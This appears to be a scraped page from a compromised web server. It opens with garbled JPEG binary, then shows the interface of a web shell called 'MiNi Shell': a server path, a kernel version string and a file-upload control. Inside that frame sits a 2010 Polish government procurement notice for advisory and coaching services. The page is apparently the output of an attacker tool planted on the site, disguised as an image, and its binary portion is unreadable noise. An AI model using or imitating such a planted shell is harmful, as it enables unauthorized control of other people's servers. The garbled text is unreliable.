JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100118/11813-N-2010.html

<p class="kh_header"><b>Warszawa: Organizacja i przeprowadzenie wsparcie doradczego i coachingu dla zespołu projektowego.</b><br>
<b>Numer ogłoszenia: 11813 - 2010; data zamieszczenia: 18.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kancelaria Prezesa Rady Ministrów , Al. Ujazdowskie 1/3, 00-583 Warszawa, woj. mazowieckie, tel. 022 6947503, faks 022 6946671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.premier.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie wsparcie doradczego i coachingu dla zespołu projektowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie wsparcie doradczego i coachingu dla zespołu projektowego, w tym:
1) przeprowadzenie usługi doradczej, określonej w godzinach, w liczbie 160 godzin,
2)organizacja i zapewnienie przeprowadzenia 144 godzin treningów w postaci coachingu dla zespołu projektowego.
Szczegółowy opis zawiera Opis Przedmiotu Zamówienia, stanowiący Załącznik nr 5 do SIWZ (który będzie załącznikiem do umowy), a także wzór umowy, stanowiący Załącznik nr 6 do SIWZ, w którym zapisane są m.in. warunki płatności.
Budżet przewidziany na realizację przedmiotowego zamówienia wynosi 110 550,00  złotych brutto (przy założeniu 22% stawki podatku VAT).
Zamawiający dopuszcza udział podwykonawców przy realizacji zamówienia, z wyjątkiem zadań z zakresu sprawozdawczości i nadzoru nad przebiegiem zamówienia.
W przypadku wykonywania części zamówienia przez podwykonawcę Wykonawca wskaże w formularzu ofertowym, stanowiącym załącznik nr 1 do SIWZ, część (części) zamówienia, które powierza podwykonawcy (podwykonawcom)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.41.52.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> -<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące.: 
1.1 Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień.
1.2 Posiadania wiedzy i doświadczenia, tj.: 
1.2.1 wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj.:
- 2 usług doradczych, z których min. jedna obejmowała coaching, każdej o wartości 50 000 zł brutto ( realizowanych na podstawie odrębnych umów), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie,
1.3 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.:
1.3.1 zapewnią zespół osób, którymi Wykonawca dysponuje, lub będzie dysponował i które będą uczestniczyć w wykonywaniu zamówienia, tj.: 
a) 1 osobę, która będzie pełnić rolę Kierownika/koordynatora zespołu, odpowiedzialną za sprawy organizacyjne i bieżące kontakty, która w terminie od 1 stycznia 2007 r. do dnia poprzedzającego dzień składania ofert, odpowiedzialna była za organizację 2 usług doradczych, z których każda obejmowała co najmniej 50 godzin zegarowych,
b) 2 radców prawnych,
c) 2 osoby, posiadające doświadczenie w realizacji zamówień publicznych, 
z których każda, w terminie od 1 grudnia 2008 r. do dnia poprzedzającego dzień składania ofert, uczestniczyła w charakterze doradcy w realizacji 4 postępowań przetargowych z zakresu usług doradczych lub szkoleniowych, a także specjalizuje się w sporządzaniu dokumentacji przetargowej, w tym SIWZ oraz opis przedmiotu zamówienia,
d) 2 osoby, posiadające doświadczenie z zakresu zarządzania projektami unijnymi, z których każda, w terminie od 1 stycznia 2007 r. do dnia poprzedzającego dzień składania ofert:
- uczestniczyła w realizacji (za wyjątkiem uczestnictwa w roli prowadzącego szkolenia) 2 projektów szkoleniowych lub 2 projektów współfinansowanych ze środków Unii Europejskiej, w skład których wchodziły m.in. szkolenia
i
- przeprowadziła szkolenia, w liczbie nie mniejszej niż 30 dni szkoleniowych, z zakresu tematyki dotyczącej projektów miękkich finansowanych z EFS, gdzie każdy dzień szkoleniowy wynosił min.5 godzin zegarowych.
W/w osoby ujęte są w wykazie osób, stanowiącym zał. 4 do SIWZ.
UWAGA: Żadna z osób pełniących funkcje omówione w pkt. 1.3.1  nie może się powtarzać.
Pozostałe osoby wymieniono w rozdz. VII opisu przedmiotu zamówienia.

W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunków udziału w postępowaniu przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski bieżący kurs średni wymiany na dzień zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia.

1.4 Sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych poniżej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt. 1.1-1.4 winien spełniać jeden Wykonawca lub Wykonawcy wspólnie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. W celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy P.z.p., do oferty należy załączyć następujące dokumenty i oświadczenia:
1.oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu określone w art. 22. ust 1 pkt 1-4 pzp, sporządzone zgodnie z Zał. nr 2 do SIWZ (oryginał),
2.wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj. 2 (dwóch) usług doradczych, z których min. jedna obejmowała coaching, każdej o wartości 50 000 zł brutto, sporządzony zgodnie z Załącznikiem nr 3 do SIWZ. Wykaz musi zawierać informacje niezbędne do stwierdzenia, czy został spełniony warunek określony w Sekcji III.2) pkt 1.2.1. Do wykazu należy załączyć dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie;
3.wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, sporządzony zgodnie z Zał. nr 4 do SIWZ.  Wykaz musi zawierać informacje niezbędne do stwierdzenia czy zostały spełnione warunki określone w Sekcji III.2 pkt 1.3.1 SIWZ oraz informację o podstawie do dysponowania tymi osobami.
4.jeżeli Wykonawca polega na wiedzy i doświadczeniu lub osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
II. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy P.z.p, do oferty należy załączyć następujące dokumenty i oświadczenia:
1.oświadczenie o braku podstaw do wykluczenia, sporządzone zgodnie z  Zał. nr 2b do SIWZ (oryginał),
2.aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych  oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy, sporządzone zgodnie z Załącznikiem nr 2a do SIWZ (oryginał).
UWAGA: Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w powyższej UWADZE, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy stosuje się odpowiednio.
3.W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie wymienione w pkt. II.1 i dokumenty określone w pkt. II.2 mają potwierdzać brak podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w stosunku do wszystkich Wykonawców. Oświadczenie określone w pkt. I.1 oraz dokumenty określone w pkt. I.2 - 4 mają potwierdzać spełnienie warunków określonych w Sekcji III.2 pkt 1.1 - 1.4 przez jednego Wykonawcę lub przez Wykonawców wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - 1.2.	Wykazanie dodatkowego doświadczenia dla dwóch osób wskazanych w rozdziale V pkt 1.3.1 lit. c) SIWZ - 10</li>
<li>3 - 1.3.	Wykazanie dodatkowego doświadczenia dla dwóch osób wskazanych w rozdziale     V pkt 1.3.1 lit. d) SIWZ - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.premier.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kancelaria Prezesa Rady Ministrów, Al. Ujazdowskie 1/3, 00-583 Warszawa, Wydział d/s Zamówień Publicznych..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2010 godzina 13:00, miejsce: Kancelaria Prezesa Rady Ministrów, Al. Ujazdowskie 1/3, 00-583 Warszawa, Wydział d/s Zamówień Publicznych lub złożyć na Dziennik Podawczy, wejście od Al. Szucha 4..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com